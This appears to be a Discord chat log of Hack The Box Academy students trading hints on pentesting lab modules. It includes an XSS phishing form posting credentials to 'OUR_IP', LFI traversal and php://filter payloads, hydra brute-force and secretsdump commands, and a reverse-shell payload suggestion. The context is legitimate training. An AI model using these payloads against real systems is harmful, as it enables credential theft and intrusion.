#modules

for both yes.

same user

ive never had that error outside of not having a sub i think so thats odd.

could try logging out and back in

see if it clears it

did that, but I'll try again

yeah works now, second relogin attempt

thanks

¯\ (ツ) /¯

i also got no idea what you mean in the first half but your command is right but i would recommend you use the windows/x64/shell/reverse_tcp for payload

will try

Hi all,
I'm in the Password Attacks module, Pass the Ticket (PtT) from Linux section trying to to get the credentials for the user svc_workstations and using them to authenticate via SSH.|| In the crontab I found the svc_workstations.kt file and managed to extract an AES-256 hash from it. I tried CrackStation.net but they do not support AES-hashes. Then I tried various hashcat modes (17010, 19700, 19900, 1400, 26403 among others) but it doesn't even let me run it most of the time. Usually stating the error "Separator unmatched, No hashes loaded". Letting hashcat auto-detect the hash doesn't help either. After miserably failing all attempts at cracking the hash I tried another approach instead.
I impersonated the svc_workstations user with the obtained .kt file and gained access to \\DC01\svc_workstations where I found the flag.txt file. But when opening the file the fist two characters is malformed (��Keytab_Scr1pt$-F1l3s) so HTB won't accept it.|| Please give me a hint on how to proceed 🙏

pm me

hii so I am having a problem with apache 2 which is in Linux fundamentals module
I installed apache 2 but when I browse http://localhost it just says error refused to connect so I figured to do "sudo service apache2 start" which didnt do shit XD

Does the vpn have a problem?

Blue box cannot be spawned at all

this is not the place for that use ++verify at #bot-commands and ask that at #boxes

i was in using the academy vpn a bit ago and it's working fine right now i'm doing offshore and that vpn also are working fine

if you are doing this on the pwnbox then you have to change the apache default port because port 80 is in used

idk lol how to change the port

hint go to where you found that file and run ||ls||

the config file is at /etc/apache2/ports.conf

find the port 80 and change it to something else

but this is only necessary if you are on the pwnbox, simple thing like this you can just do on your vm

no am on my terminal on my own vm

sorry if i sound dumb am still new to this XXDD

as long as you don't as dumb shit like how to hack you are good

lmfao

so after you run sudo service apache2 start you can run sudo service apache2 status to check apache2 status and if it is running then you can just visit it on your browser

also you can read the config file (at /etc/apache2/ports.conf) to see what the port is, most likely it will be the default port (80) but if you can confirm that apache2 is running nothing on port 80 then you should check the port

it's http, but if it's can't connect it's will auto change the url to https

yeah it does that

so is the default port still 80?

it tells me there is no such directory when i do cd /etc/apache2/ports.conf

that's not a directory it's a file

use cat

oh

there is a Linux Fundamentals module on the academe so if you are new to linux give that module a go

i think that module also show you some stuff about apache

dude

its why am askin about apache

XXXDDDD

why tf would you use firefox in your vm for the academy?? if your kali don't have much ram or resource then just use the browser on your host

its because the target doesnt spawn on my host browser

also you can use sudo netstat -ltp to get a list of running process and if apache2 is running on the port 80 you will get [::]:http

why are you searching for passwd.php?

if you have adblock one that could be the issue

oh am usin brave

okay thanks XXD

how to know, it is written in the question

read the question and then think

yes, it is written in the question the last word

i chaneged it to 8080 and still doesnt work

so nothing on localhost:8080 ??

Oh my! Thank you 😀

try curl localhost:8080

just printed a lot of lines of html and css

yeah that is apache2

no idea why you can't access it from your browser but apache2 is clearly running

me niether

ok man appreciate it broski

You are doin https instead of http in your browser

nah xD

it just returns it with https automatically despite i put it as http

@wheat adder try to change it with brup

if you clear the browser search bar and type the IP address it should work

https://www.hackthebox.com/achievement/machine/898742/500

Just pwned the photobomb

Any help would be appreciated, I'm on the last question of the Using Web Proxies Skills Assessment and I feel like I don't understand the wording of the question... basically capture traffic request from metasploit through proxy (burp or zap) and "find the directory being called in '/XXXXX/administrator/'..?'" the hint says to use any website as RHOST, so I'm not using the provided target system for this ?

Hello guys i have a problem with final exam in LFI

https://academy.hackthebox.com/module/23/section/513

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

I tryed everything... and nothing works.

This is what i found about the target

http://134.122.103.40:31516/index.php?page=value

Server: nginx/1.18.0
Powered-By: PHP/7.3.22
ary: Accept-Encoding

I tried PHP Wrappers but it returns blank /etc/php/X.Y/fpm/php.ini

curl "http://<SERVER_IP>:<PORT>/index.php?page=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.3/apache2/php.ini"

Returns blank

i passed this but i got stuck on the exam myself

for what you are doing in that module that is correct. no matter what rhost you set metasploit is going to try to call a specific directory for the specific exploit you are using. they are asking you to intercept that request that metasploit is doing via burp or zap and find what the directory is

@devout cliff Thank you very much ! I got it to work with burp, dunno why it wasn't working with zap yesterday.

np

if it returns blank, maybe look for something else that could be useful

Log poisioning, LFI and File Uploads, RFI is out of the option

if you can't get any of those to work, look for something else that could be useful

DO you know how to call another function ?

something that would really help here is ||page source code||

leverage the knowledge you've gained from the module to find what you should be looking for

i am looking at the source code right now

what ip address

localhost

how do i view its ip address

no you just type localhost

no doesnt work

that sucks then

XD

when the browser gives me a hard time with HTTPS not changing to HTTP i just clear the search bar and type it again and it usually works

yeah i do it too

Just try http://localhost

but nothing is working

try http, not https

lol that aint da case

Do netstat -l

for some reason it changes to https automatically..

yep

See what port it's listening on

automagically imo

Can you give me few pointers ? I am stuck at reading the source code but i cannot find anything unusual

8080

That's why

Put in localhost:8080

http://localhost:8080

yeah it works thank yoouu

@devout cliff @fathom pendant @dim wolf

Http protocol defaults to 80, it automatically switches to 443 if it doesn't detect a service running on 80

some backend code might not be visible because it's on the backend.. maybe if you can get your hands on the actual file, you'll find something

Can anyone give me a hint for the broken auth skills assessment? dm to avoid spoilers?

gobuster time

Oh yeah that reminds me I went to sleep earlier when I threw John at the hard skill .vhd file

well, did you get a hit?

Idk lol I was tired af and was like "I could use sleep"

i did the same thing with the hashcat skills assessment

except that was a complete waste of time

I'm stuck with the ||support user|| and ||trying any password matching the password policy from rockyou.txt|| does not lead anywhere

thanks for the tips i go to bed now but ill continue tomorrow

php.ini is a file on a backend and probably system() function is disabled

@dim wolf ggez

excellent

Are there any modules/sections on getting persistence?

Cuz like nothing in CPTS covers it at all and I feel like that is really important

Theoretically you could hide a shell file and create a benign system service to call to

Its not that important for the level CPTS aims at

or at least, the very obvious ways to persist that you should be able to run two braincells together to figure out is more than adequate for the non-evasive testing that CPTS teaches

i really cant figure this out, i dont know what am i doing wrong

is it tomorrow already??

i cant sleep, it bothers me..

how can you grab the full source code of a page?

you won't be able to get the full source code if you simply right click and open page source

that will not tell you everything

curl "ip:port"

that will not tell you what goes on on the backend

than burp ?

that will not do either

if you can find some way to get the full source code of the webpages

maybe you can just read the source code from the server itself??

Like... you can somehow manipulate something
For example, a request you send to the server
I think that if you can manipulate it somehow, it will give you what you're looking for

I keep getting a error on the DCsync assesment in the AD module: Someone else who has this problem to and knows how to solve this? python3 secretsdump.py -just-dc INLANEFREIGHT/adunn@10.129.21.35 -outputfile hash
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[-] NTDSHashes.init() got an unexpected keyword argument 'ldapFilter'
[*] Cleaning up...

was that subtle enough?

enough for a start

i need to research more into this

you may benefit from rereading some sections in the module

PHP wrappers

what share are you trying to connect to?

Take a look closely at the question; it's not asking you to connect to the share :) it's just asking you what the Full FilePath is

you ARE meant to RDP into the machine

ah so you're using the pwnbox

you should be able to use smbclient //IP/share-name -U htb-student

I read the PHP Wrappers

¯_(ツ)_/¯

Try resetting the target

going through the steps again

and trying to connect agian

then idk man best to just move on, plenty of modules make proper use of it ¯_(ツ)_/¯

it doesn't matter which rdp command you're using to connect

RDP is RDP

xfreerdp /u:"username" /p:"password" /v:IP

I cant figure this out

are you trying to smbclient from within the windows host?

if so: that's why

try smbclient from the vm

ok. start from the beginning.

start the skills assessment VM. look around and search for a potential LFI. if there is one, see how you can exploit it and what information you can get from it.

can someone help me with linux priv escalation module?

if i put IP:PORT/index.php?page=/etc/passwd
It returns blank page

Hello someone can help me with CrackMapExec Skill Assessment ?

the rest is Invalid input

nice pfp bro

https://media.discordapp.net/attachments/988862412260274176/1060160760875069450/C71D19ED-1A35-4F1F-8048-BD5FD36A9C08.gif

click on the gif before, but thanks U2 bro

i'm sorry but i can't think outside the box for you. you're gonna have to do that yourself.

what program besides curl and burp you used to view page source ?

@final trench best not to get hung up on trying to follow along too closely sometimes

damn man

lmao

i got a better one tho

😎

Ill sleep over it. Its allready late and i have to get up for work tomorrow

which module are u working on?

https://academy.hackthebox.com/module/23/section/513

Skills Assessment - File Inclusion

you can try many filter bypasses (....//....//....//....//etc/passwd, etc)

you should re read the sections

also IP:PORT/index.php?page=/etc/passwd wont display etc/passwd cause this path isn't present in the web root folder

always go back

^

why the double // in the backup and not single?

its the last exam, i have to think outside of the box but i cant read source code straight from the server

or is that a filter thing

there are filters wich remove sus payloads from petitons

one pretty common removes ../

so ....// - ../ = ../

clever girl

https://media.discordapp.net/attachments/732550927378022440/1070026322493063199/ezgif.com-gif-maker.gif

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

http://161.35.170.114:31389

?

that's the question he's struggling with

i mean yeah, that is literally the final assesment

:^)

usually the answer is within the modules though

it is

seems like he rushed them

doing lfi like this IP:PORT/index.php?page=/etc/passwd makes 0 sense

yeah

that just looks incorrect

I understand testing lfi by checking /etc/passwd

but generally you need to get to that root folder

thats it

page= just means that in the index (webroot) where are you navigating to?

page is a GET parameter

sometimes that value works and it opens up /etc/passwd

but usually it doesn't

only if web root dir isnt specified i guess

but it's best practice to just walk it back first

otherwise / = /var/www/smthng usually

../../ always works wheter /etc/passwd doesnt

ye

i am improving i got base64 decoded

Hello, I am stuck with this question Escalate privileges using the same Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.

I got a new web page

you don't have to ping me for everything..

thats odd

right

lol fml

do i restart again lol

Hi, everyone, I have to perform subdomain enumeration against gihubapp.com for the final question in the Information Gathering Web Edition module, to find a subdomain that has the word 'triage' in the nam. Already tried using sublist3r multiple times, as the hint suggests, but it didn't work. Any ideas?

how to use burp to poision the log ?

try looking up the certificates

hey man, you just need to download the exploit and run it

^

"use the exploit and do the thing"

Guys help idk what to do

sums up half of what it is here LOL can't say I haven't done the same though

Ok i downloaded from here https://vulners.com/zdt/1337DAY-ID-30003

i do following

spoiler that link thx

guys does anyone know to get a interactive shell form meterpreter without python?

there's some information about that in the Shells & Payloads module

noted

thanks

I would say this image would be a spoiler

ugh my bad

I am trying to complete the Footprinting-Hard Challenge but the openssh private key keeps getting denied as Permission denied (publickey). I have set the rght permission and ownership options.

are you sure you copied the id_rsa correctly?

with the --Start and ---END blocks?

Yes, of course.

I have used the 1 FETCH 1 body[1] command to fetch the key.

How can I display the whole message?

rfc822

?

Maybe tom is not the username?

just use an email client

if you are only getting a little bit of the message and you want the full message when in the mailbox i think you have to -rfc822

¯_(ツ)_/¯

1 FETCH <id> body[text]

that's what they did

oh wait

nvm

It was the f*cking copy-paste

I see what the difference is

also sometimes copy/paste adds an additional line that rsa doesn't like

Try another field for the payload, and try the payload from the session hijacking lesson

It screwed up bu not importing the whole last line.

F

yeah, when using tmux it derped out for me i removed tmux and was fine

I didn't care enough to use tmux

Brother that message was from a month ago. you good?

No, lol 😂

i'm glad I realized I could filter the Stdout as a command is running so that I didn't just have a wall of "Logon_Failure" in CME unless there's a way to filter it out in cme that I'm too dumb to know

Are there any modules that show use of Sliver?

there's a search function in the modules page

¯_(ツ)_/¯

PIVOTING, TUNNELING AND PORT FORWARDING. Im on the last question, where i need to get the flag from the Domain Controller, i think i already have the IP of the machine but i cannot manage to hace access. Im using netsh on the 2 and the 3 machine to get access to the Domain Controller (the 4 machine) it is possible that I am doing more that i'm suppose to hahaha i'm missing something. any help is appreciated guys

what academy modules would allow me to do a majority of the easy HTB machines asap (like within the next couple days). im assuming "Getting started" and "penetration testing process". i was doing photobomb but had to self learn burpsuite and web attack vectors because i hadnt gotten through that in Academy yet

submitting my resume somewhere by end of next week and want to get to script kiddie or the one above that before i submit so i can include that progress in my resume

being completely honest here: if you only do the easy boxes just to have this illusory prestige - then you're not actually looking to learn how to use tools

there are plenty of modules regarding the fundamentals

that are all 10 cubes and refund 10 cubes once completed

so essentially "free"

so would it be better to show what ive gotten through in the academy compared to machines?

i have student plan so i can do up to tier 2 but obv ill start with the basics. just wondering if the "getting started" and "penetration testing process" should be the ones i do first

it depends on the job tbh

its for work placement so technically i dont know the job. just trying to stand out compared to other classmates

this is a discussion that is heading towards #careers-and-certs

yeah fiar. i guess ill just do what i can within the next week

delete the picture and yes you're very close just the orientation may be off

how are linux files shown compared to windows?

cough look at your own linux terminal

pwd

mhm

:)

YEP

lol

that's why i was like "you're THIS close"

stuck here, "Firewall and IDS/IPS Evasion - Hard Lab". Please hint 😉 Thinking large data = UDP, tried fast UDP with no DNS resolution and service detection with decoy random:5. Already exhausted TCP stealth techniques (fragment, MTU, min-max ttl, etc.

@slender shoal mind is focusing on the administrator going to training for "one week" and having to change protocols

@slender shoal right direction?

copy... I'll look back in the module (crosses fingers)

Follow the last two examples in the module, don’t over think it.

hi everyone

@slender shoal @plain coral Thanks for the tips... main thing I learned... patience is a virtue. Just wasn't waiting for it.

o7 HTB, On Pivoting, Tunneling, and Port Forwarding Skill assessment and have lsasso'd some cred for v*****... I'm now stuck figuring out my next move towards the DC....also on another now How do we id a DC in our pentesting context - "from outside peering in"?

mod= File Transfers -section Windows File Transfer Methods -2nd question. cant connect RDP- tried xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:10.129.201.55 also tried using remmina and just errors out with freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]

any ideas?

does anyone know what were supposed to be doing on the nessus assessment. it says to log in to the machine which i have but it doesnt seem to have the nessus service on it

Edit: Nevermind i figured it out

questions for Active Directory Enumeration & Attacks

1. for DCSync Q3, am i suppose to use the windows RDP to get the answer? (i got the answer by using chisel and following the previous steps)

2.For Privileged Access Q3, same question as above, i basically just use chisel to connect them together @.@

3. for AD Enumeration & Attacks - Skills Assessment Part I,
   do i have to do everything in that webshell or can i just get a new shell from it?

Skills Assessment - Using Web Proxies - The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer. Looking for a nudge on this. The cookie I see is already in cleartext cookie: X*******. Have tried multiple decoding variations, but can't see anything. Thanks!

I am not able to connect to windows 10 VM using RDP. I get errors each time try to connect. I am on windows fundamentals.

Nvm, I solved it by just changing the VPN file and restarting the VPN several times and now it works.

I'm going through the network enumeration with nmap module and although I've gotten the flags for the boxes, I can't seem to get ip spoofing to work. In the examples it works fine when spoofing your IP with Nmap from the same subnet as the host you're scanning, but when I do it
-S 10.10.10.10 -e tun0
Nmap says it can't find the route.
I read off of Google that you have to be in a place to capture those returning packets (like attached to the network you're scanning), but in the context of this module/lesson, im a bit confused

It automatically disconnects from windows 10 VM, any solution for this?

only after connecting of 4-5 seconds.
ERROR - ```xfreerdp /v:10.129.36.104 /u:htb-student /p:Academy_WinFun!
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:53:937] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[09:30:56:523] [14279:14280] [ERROR][com.freerdp.core] - freerdp_post_connect failed

ffuf only 1/8th done after 30 mins... thread count 200

WTF any tips?

this is one you might not be able to just follow along with irrc

give it coffee

🙂

IP is goign to reset before i even finish the scan.

oofda

Has anyone had antvirus block websites while doing ffuf?

blocking for malware?

Is HTB trying to hack me?

@tidal kelp you are on the right path, ||check the log file "Responder-Session.log" under /usr/share/responder/logs||

can I use openvpn connect and vnc on my Android tablet for htb?

Just curious but how long is the longest you guys and girls have spent on a box because you refused to see the hint?

Good morning guys

~3-4 hours

You doing penetration tester path?

ye

one of the boxes for the module section i'm on i had to reset several times for the service to pop up

sorry sir, can i dm you about this section?

Is it impossible to attack a Apple device?

No

A cyber-crime group called Pegasus had done it a lot actually

So, why is it never mentioned in most HTB?

@tidal kelp sure

I think as hackers, we should also know about Mac & iOS attack methods

i see in Active Directory Enumeration & Attacks, "sudo crackmapexec".
is it important to use sudo with crackmapexec?

for the most part most enterprise networks run Windows/*Nix devices

Okie...

What about a pentest job comes up for an Apple system?

i dunno but i never use sudo with CME

you learn how to attack apple devices; i'm just stating the common reason why

That's fine tho. I bet they must have an even thicker levels of security

not necessarily it's mostly compatibility

Apple Devices run off a fork of Unix

yes same i tried without sudo as the crackmapexec website docs and it works fine. just was confused from the cheatsheet. but thanks all good 👍

so technically most things that would run (i.e. linpeas) would work

LOL trying to hack a artist?

Explain linpeas

it's an exploit checker that checks common exploits and tests to see if the user can perform them in terms of privesc

Kudos man!

You're good

Whats yall opinion on the hardest module?

Documentation and Reporting if you actually do it right

if you just want it checked off, its super easy to blitz through it

but if youre doing it right and its youre first time actually dealing with making reports and formatting findings while mixing it into your methodology? its brutal

Modul: INFORMATION GATHERING - WEB EDITION
Section: Page 7/ Active Subdomain Enumeration
**Problem: ** I dont know what should i do with ip in Q:4,5
Can someone help me?

Anyone has a nudge for me on Broken Authentication skilss assement? With the wordlist shown in the modules I find my own test user and one other + the user I got from reading the website

Tried bruteforcing the password of the account found on the website using a filtered rockyou based on the password policy but didn't seem to get a hit

I know how the cookie works but I get an error page if I tamper it to another user

This is were everyone thrive who has done something like a thesis

It kind of the same structure

Hey guys,
I'm doing Web attacks skills assesme but the reset token doesn't change when i request it so I get invalid token

any one did LPE module , i have a question Note: There is a way to obtain a shell on the box instead of using the SSH credentials if you would like to make the scenario more challenging. i need a hint

Broken Authentication

when i did it i wanted to throw my pc out a window so many times

i had to ask for so much help because it felt like the module used things and asked for additional weird knowledge outside from what they taught you

but its been several months since i took it, so i dont remember all the details of it

im about to start the attacking common apps skills assessments, do i need to lock my windows?

i havent done it yet

i got so frustrated with broken authentication ive parked it for now

hate wild goose chases wondering if you have the right wordlist or not lol

Do you have a nudge for me on this one? Or on the brute force skill assesment the second step?

or you? I also don't like the wild goose chases and I only need to finish these two labs to be able to do the exam

i dont have the time right now unfortunately to go into it i apologize

Okay, no worries

i would have to redo the assessment

i dont have my notes on it anymore, they went poof

sorry mate no, try searching the hackthebox forum

i found a lot of nudges in there also

yeah, did the same thing. I think I should have the right thing now for brute forcing but somehow it is not working ...

so would be handy if I could verify with someone

You almost there; just ensure every line in the numbers.txt file is prefixed with htbadmin e.g "htbadmin1676025163010". A tool like 'sed' can be handy

mmh anyone had the same problem where the attempts don't seem to go down?

maybe turn down the thread count?

im not sure

try default thread count and see what it does

no difference hmmm

i wish i had more time to look into it but just looking at it i dont see the issue. have you already tried resetting the box? other than that i would just double check any syntax in the command. it seems that hydra isnt hanging but maybe getting an error from the box? i would maybe proxy the output to burpsuite/zap and see how everything looks from both sides and then troubleshoot from there

Dayum

yeah i would need to look at it later today to remember what issues i had with the module as a whole. i can imagine it might give me some ptsd-like symptoms though once i recall what happened

i just remember it was not a good time with that module. i think it took me maybe like a week or so to finish?

mmh yeah I'm really confused because box seems to work still

a forum post mentioned that you can do it with rockyou-10 but testing with burp as well now and it seems that it is not in rockyou-10

Anyone have a help for Login Brute Forcing - Skills Asessment Website (question 2, the login form)? The hint says to use the username you found earlier--the user name found in the question before was ||user||. I noticed the parameters were different so I changed them and the fail string. I'm trying: ||hydra -l user -P rockyou-10.txt -f 134.122.103.40 -s 31941 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"|| (rockyou-10.txt is in the directory)

You forgot the basic auth header

You have to add that one to be able to reach the website

However, I’m struggling too bc even with that it didn’t work for me yet

I'll add that.

Let me know if it works for you :). I like to move on with this assessment too

imm on the XSS phishing module in the acedmy. it says port 80 is alrady in use so i cant use netcat to listen on port 80. how do i fix this

the process running on port 80 presumably is the HTB browser cause if i kill the pid the entire box goes blank

the instructions say to do nc -lvnp 80 but it just wont work

how about running on another port that is not being used?

if i try using like 8080 i get nothing back from the /send.php page\

Don’t forget to adjust your payload and at the port in the payloadurl

but you are providing almost no info. Why do you want to listen for? Why port 80?

GENIUS. only problem now is when i send it on send.php its saying its an invalid url but it worked on the other page, hmm let me try something

think its cause im having isdues removing a form hmmm

Any luck @tribal plume?

can somebody pls explain me why tf its not connecting to mysql db?

i dont understand if the server has some connectivity problems or not, been trying to refresh the target several times, im wasting time just to try to connect to a db wtf hahah

Afraid not. I'm going back and rereading the module on the form logins.

can someone tell me which part of this script is fcking up (sending ss one sec

I'll try the bigger wordlist maybe. I used rockyou 10 because it was on the server previously.

oh fck its getting URl encoded

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

thats the base of the script, but it isnt removing the image box at the top

solved it, fuck i had to use ||mssqlclient.py|| ffs

The problem I’m having is that hydra doesn’t seem to really perform the attempts

Oh, it seems to have done them for me.

like i think i need the form removed but code aint working, ive confirmed the form is called urlform

okay if I DM?

Sure.

Hi, I need help for the live engagement - Shells and payloads on the second question. I upload the .war file and it was successful and I have the shell, but I cannot reach the folder C:\Shares, I don't now why, I try different commands (dir,ls,tree,cat) but still don't work. Maybe it's something simple but I'm lost 😦

ok simpler example cause this is the main issue

when i just try using this document.getElementById('urlform').remove();

it does not remove the form even if thats the only part of the script

urlform is 100% the name of the form

any help or advice for this Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \DC01.inlanefreight.htb\john ? i cannot solve it

module: password attacks
sec:pass the ticket

wait what it connected back to my machine even if i specified the target ip, wth?

im confused

p

any tip pls?

Hi all,
I'm in the Password Attacks module, Password Attacks Lab - Easy section, trying to find the root password. ||I've managed to get access with user mike via SSH and have tried all search scripts in the Credential Hunting in Linux section without anything noticeable sticking out. Furthermore i tried looking at the /etc/passwd and /etc/shadow files but they don't seem to have a weakness. I also tried downloading LaZagne via smbserver.py but was unable to because smbclient is not installed on the target. I also tried downloading it via python3 -m http.server 8000 but was unable to unzip the file I had saved Lazagne in. I have also confirmed that it is not connected to an AD with the realm list command.||
Can i get a hint please? 🙏

It's MSSQL DB, mysql command wont work and sqsh is broken on attack box, try mssqlclient.py

is it normal that it spawns back to my vm?

wdym?

i logged in via mssqlclient.py but i just see my vm contents

never used this tool i a bit confused haha

You're in the DB itself

so now you execute MSSQL Commands

holy crap the common apps skills assessment 1 was tricky

Thats the 1st thing i did but its not accepting any kind of mysql command like ' show databases; ' does it require a different syntax?

Yes, MSSQL has slightly different syntax than mysql/mariadb

Should be covered in the section, the basic MSSQL commands like showing databases,tables,columns , etc..

k thanks, it a bit confusing at first haha

Hey people, I have a weird issue with ffuf. I'm working through the module "Attacking Web Applications with ffuf". Throughout the whole course I had this issue that ffuf would get really slow mid-scan, the req/sec would drop really low, the error counter would stack up, and my whole internet connection would not work. I couldn't load sites in the browser. Eventually the scan picks up again, goes to a normal req/sec rate, and my browser becomes responsive agian. This is really hindering the completion of the final skill assessment and general use of ffuf. Any ideas what's going on there?

Error: error on running gobuster: unable to connect to http://64.227.35.4/: Get "http://64.227.35.4/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)

help

try uname -a

Did that too

I tried all the numbers just in case and none of them works

how scared should i be about starting AD enum and attacks? 😛

It says it updated 2023-01-12 so maybe they havent updated the reply box?

if i am struggling on a moduel, is there a way i canj ust skip to the next one

like im in the bug bounty xss module and just struggling and would like to continue the bug bounty thing but just go to the next one

But I want to complete it and I want my cubes. Im not struggling to find the info, im struggling to make the proper info work

sure but i believe to sit the exam you must complete all modules in the path

ye how do i skip to next one, ill come back later

anyone

ah i figure it out i think

I'm so stupid that I can't do the first task haha

there was actually either issue or it could be tricky question as well

anyone help me with web enum

getting-started module

And you're using the pwnbox to answer this question?

LOL actually I tried the new integrated terminal and got confused, its all good now 😅

Hello @lethal atlas , where you able to resolve msf "exploit aborted due to failure: unexpected-reply" while running wp_admin_shell_upload. Being the user with admin creds, clearly the enumerated user has permission to upload files. There is no FW or AV . Not sure why it is not working? Any idea what worked for you?

really ?

It's all relative; I found the PW attacks pretty trivial tbh

I am not near my pc right now but I can help you in a couple of hours if you still need

Except fucking kira

Eh even knowing about kira it really wasn't all that bad for me

I hit the kira wall but wasn't stuck for too long

Can someone help me? I have a shellcode, I use the loader to load, but can not bypass the anti-virus software interception, may I ask what I should do? Is there anyone who can help me or provide some tools?

What module is this related to?

Someone else working on broken authentication final assessment? Could use a small nudge (only lab left 🙂 )

is this a module?

I'm sorry

If not, can we please keep this channel module related.

any hints

DM

anyone else has this error when trying to open the embedded burp browser?

this is under shells and payloads php shells

Looks like burp doesn't have a default browser to use maybe?

it does tho

been stuck for 1hr trying to get burp to work lmao

i even reinstalled the latest version

Check settings, see if it's using Firefox

here?

Hmm not sure I havent had any issues myself with burp

hmm maybe i try setting up foxyproxy then

thanks

Yes please @lethal atlas . I mean i can try to get shell access via other roots, like tinkering themes but just not sure why msfexploit doesnt work. So were you able to fix that issue or tried someother workarounds to solve the problem

hello, can someone help me, I don't understand why I can't ping or do an nmap scan in the modules

This is a docker container, so you're not going to be able to scan it

This section is about using the web techniques discussed to enumerate the system

I wanted to try to recover the version of wordpresse but thank you

He has an interesting history

Maybe check there

Let me double check my notes

Yea, i looked at that too...

will try again

Yep

Does anyone know if it is normal for skills assesment of broken auth that you end up with 4 passwords from rockyou that are in line with the policy?

If you look carefully you'll find it; look for root in that history

Found it, thank you. What a ride i went on there 😅

mike is bad at opsec

just a note in the med/hard labs are where you'll use the mutated custom list so be prepared

just so you're prepared :)

I went for the mutated list straight away in the easy lab too. It took me 4 hours to find the right one. I guess i tend to over complicate things haha

^ I did the exact same. Easy lab took me 3 days easy. Medium in my lunch break. Hard, maybe tonight 🙂

from what i've heard with many of the password attacks related things: it'll either be the pre-given list or rockyou.txt

Really need to work out the approach before blindly starting, hehe. Also this module be like hey remember that password from 7 sections ago, use it here. Ugh, ofcourse I didn't save that...

yeah

I honestly loved pw attacks because it was a test of how good of a note taker i was

alongside the general knowledge

Agree, I learned from it 🙂

because I was able to jump from "ok I got this, what's the 2john I need to use for this?"

it's pretty fun though :)

LMAO i just gave my vm more ram

and it worked

wtf

yeah that'll do it too

default I think burp uses chromium

This I remember. I believe you will have a low number of passwords that match the policy. I don't remember the exact number but it won't be just 1 password or not. And you need to be very careful with looking at the policy and get it exactly right as intended or i think you can get locked out for x amount of time.

Yeah, I know have 4 and the lockout starts after 5 attempts but it seems not to be working :p

Pm me the password list you have narrowed it down to based on the policy

Ehm..??? my post disappeared?

Might've had a spoiler idk

pm'ed 🙂

It didn't... Will try again... crackmapexec thinks it found the password even though it didn't. Anyone know why? How do i make it run?
||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ crackmapexec smb 10.129.89.36 -u john -p password.list SMB 10.129.89.36 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False) SMB 10.129.89.36 445 SKILLS-MEDIUM [+] \john:123456||||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ smbclient \\\\10.129.89.36\\JOHN -U john Password for [WORKGROUP\john]: tree connect failed: NT_STATUS_BAD_NETWORK_NAME||

use the verbose flag to check the details

||┌──(kali㉿kali)-[~/HTB/PasswordAttacks/PasswordMutations] └─$ crackmapexec smb 10.129.89.36 -u john -p password.list --verbose usage: crackmapexec [-h] [-t THREADS] [--timeout TIMEOUT] [--jitter INTERVAL] [--darrell] [--verbose] {ldap,ftp,winrm,ssh,smb,rdp,mssql} ... crackmapexec: error: unrecognized arguments: --verbose||

???

--continue-on-success iirc

You will need to put the argument at the beginning before the protocol. CME can be weird on where arguments are placed

^

the arguments after smb are all related specifically to the smb

Im on the shells and payloads assesment, may i know what is the default web browser for parrot os?

so it's basically cme {arguments} {service} {service-arguments}

firefox & in terminal

ok thanks

looks like you're rdp into something. so that may be why

that's why you're not getting an answer

the other easy way is to just create a .html; navigate to the file; and attempt to open

¯_(ツ)_/¯

question
how am i actually supposed to do htb academy if it costs cubes
to get cubes you pay
i don't have money to pay, i have 40 cubes and the first module is 50 cubes?
wrong channel, maybe but I don't know where else to ask

@fathom pendant: --continue-on-success iirc does not work - syntax error.
@storm jackal: ||DEBUG Started thread poller DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG:root:Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused DEBUG Error retrieving os arch of 10.129.171.227: Could not connect: [Errno 111] Connection refused SMB 10.129.171.227 445 SKILLS-MEDIUM [*] Windows 6.1 Build 0 (name:SKILLS-MEDIUM) (domain:) (signing:False) (SMBv1:False) DEBUG:root:Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG Error creating SMBv1 connection to 10.129.171.227: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'") DEBUG:root:add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2 DEBUG add_credential(credtype=plaintext, domain=, username=admin, password=123456, groupid=None, pillaged_from=None) => 2 SMB 10.129.171.227 445 SKILLS-MEDIUM [+] \admin:123456 DEBUG:root:Stopped thread poller DEBUG Stopped thread poller||

